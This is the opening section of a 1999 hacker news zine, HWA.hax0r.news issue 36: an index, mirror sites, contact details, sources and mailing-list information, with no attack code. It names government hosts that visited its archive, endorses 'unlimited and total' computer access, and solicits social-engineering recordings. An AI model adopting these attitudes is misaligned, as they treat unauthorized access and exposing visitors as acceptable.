Copy Link
Add to Bookmark
Report
hwa-hn36
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 36 Volume 1 1999 Oct 3rd 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================
Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
"your enemy is never a villain in his own eyes, keep this in mind,
it may offer a way to make him your friend if not you can kill him
without hate, and quickly."
- Unknown
(From the Sam Spade port scanner tips dialog for windows 9x)
http://www.blighty.com/products/spade/
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
The Hacker's Ethic
Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a perjorative.
Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:
1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
A Comment on FORMATTING:
I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endevoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
New mirror sites
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.
http://www.csoft.net/~hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #36
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #36
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
`ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. The Real ReDATtAck poised to Attack Belgium?.....................
04.0 .. FAQ and Guide to Cracking by Mixter..............................
05.0 .. DOD Launches Computer Crime Lab .................................
06.0 .. IBM to Launch Security Chip .....................................
07.0 .. Law Firm Sued Over Possible Cyber Attack ........................
08.0 .. Danish Man Sentenced for Intrusion Attempt ......................
09.0 .. DOE to Spend $80mil on Info Security ............................
10.0 .. The Army Wants to Eliminate Passwords ...........................
11.0 .. MediaPlayer and RealPlayer send GUID's to internet sites.........
12.0 .. GTE accidentally sends unlisted numbers to telemarketers ........
13.0 .. ``Relationship Marketing?'' We have to talk......................
14.0 .. News and views from SLa5H........................................
15.0 .. Forbidden Knowledge #7 is being released.........................
16.0 .. The 'real' story behind JP and PSS as per Forbes magazine........
17.0 .. ActiveX Buffer Overruns Advisory.................................
18.0 .. CyberArmy: Wingates list.........................................
19.0 .. Internet Vigilantism A story so fantastic it just might be true..
20.0 .. Forbes calls AntiOnline's bluff..................................
21.0 .. BO2K, good or evil? The Debate Continues. .......................
22.0 .. 97bit ECC Stronger than 512bit RSA ..............................
23.0 .. DOE Loses Dough to Budget Cut....................................
24.0 .. California Proposes Email Eavesdropping Law .....................
25.0 .. Singaporean Boy Sentenced to 12 Months ..........................
26.0 .. CIA Funds Startup VC Firm .......................................
27.0 .. BO2K, NetBus, and now WinWhatWhere ..............................
28.0 .. Microsoft, Insecure or Just More Prevalent? .....................
29.0 .. Darktide Hacking Is Closed ......................................
30.0 .. NIPC Head Warns of Y2K Bug Fixes ................................
31.0 .. Better Computer Security Needs More Than Just Laws ..............
32.0 .. New NT Security List Started ....................................
33.0 .. Computer Security Dictionary Released ...........................
34.0 .. CyberWarfare - Real or Imagined? ................................
35.0 .. Theo de Raadt and OpenBSD Profiled ..............................
36.0 .. SPAM HOUSE.......................................................
37.0 .. NET-SECURITY SITE INFO...........................................
38.0 .. PCWEEKS' HACKER CHALLENGE "RIGGED" FOR NT........................
39.0 .. DUTCH "CYBERCOPS" PATROLLING THE NET.............................
40.0 .. BIKE WEB SITE HACKS ITSELF.......................................
41.0 .. ARMY STUDYING IT RECRUITMENT.....................................
42.0 .. TRUSTE OK'S HOTMAIL FIXES........................................
43.0 .. SECURE DSL TECHNOLOGY............................................
44.0 .. HACK, COUNTERHACK................................................
45.0 .. NO SAFETY IN NUMBERS.............................................
46.0 .. YAHOO! MESSENGER DoS.............................................
47.0 .. PROBLEM IN MCF40.DLL.............................................
48.0 .. US AIMS TO FIGHT ATTACKS ON FINANCIAL SYSTEMS....................
49.0 .. DIGITALBOND ON SSL...............................................
50.0 .. THE FUTURE OF AV COMPANIES.......................................
51.0 .. UNPLUGGING THE "PHONEMASTERS"....................................
52.0 .. INDIA RESPONDS TO Y2K ACCUSATIONS................................
53.0 .. ANOTHER IE 5.0 HOLE EXPOSED......................................
54.0 .. TELECOM INDUSTRY DECRIES DIGITAL WIRETAP DEADLINE................
55.0 .. FED COMPUTER SECURITY BILL HAS STRONG SUPPORT....................
56.0 .. JUSTICE DEPT. TO FUND ANTIHACKING CAMPAIGN.......................
57.0 .. COURT TO REVISIT CRYPTO RULING...................................
58.0 .. DRAM ROBBERIES...................................................
59.0 .. DON'T BLAME BO FOR SECURITY PROBLEMS.............................
60.0 .. WHY HACKING CONTESTS ARE A BAD IDEA..............................
61.0 .. NO $35 MILLION FOR DOE CYBER SECURITY............................
62.0 .. DOD SELLS NON Y2K COMPLIANT EQUIPMENT WITHOUT WARNING............
63.0 .. HATE ON GOVERNMENT WEB SITE......................................
64.0 .. MS: JUST KEEP ON PATCHING........................................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA.. .................
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
Websites;
sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.
BUGTRAQ moves to a new home
---------------------------
First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.
Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.
The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:
BUGTRAQ@SECURITYFOCUS.COM
Security Focus also be providing a free searchable vulnerability
database.
BUGTRAQ es muy bueno
--------------------
It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.
As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).
What is Security Focus?
-----------------------
Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.
On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:
* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to other that may be
potentially affected.
The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBS INCIDENTS FirstName, LastName
Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.
On the information resource front you find a large database of
the following:
* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well are links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.
* Products. An incredible number of categorized security products
from over two hundred different vendors.
* Services. A large and focused directory of security services offered by
vendors.
* Books, Papers and Articles. A vast number of categorized security
related books, papers and articles. Available to download directly
for our servers when possible.
* Tools. A large array of free security tools. Categorized and
available for download.
* News: A vast number of security news articles going all the way
back to 1995.
* Security Resources: A directory to other security resources on
the net.
As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.
I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.
I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.
Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--[ New ISN announcement (New!!)
Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM
It all starts long ago, on a network far away..
Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occured, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.
As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)
mea_culpa
www.attrition.org
--[ Old ISN welcome message
[Last updated on: Mon Nov 04 0:11:23 1998]
InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.
The subject line will always contain the title of the article, so that
you may quickly and effeciently filter past the articles of no interest.
This list will contain:
o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..
Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:
* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota
All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).
Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributers.
ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/
ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.
The ISN membership list is NOT available for sale or disclosure.
ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
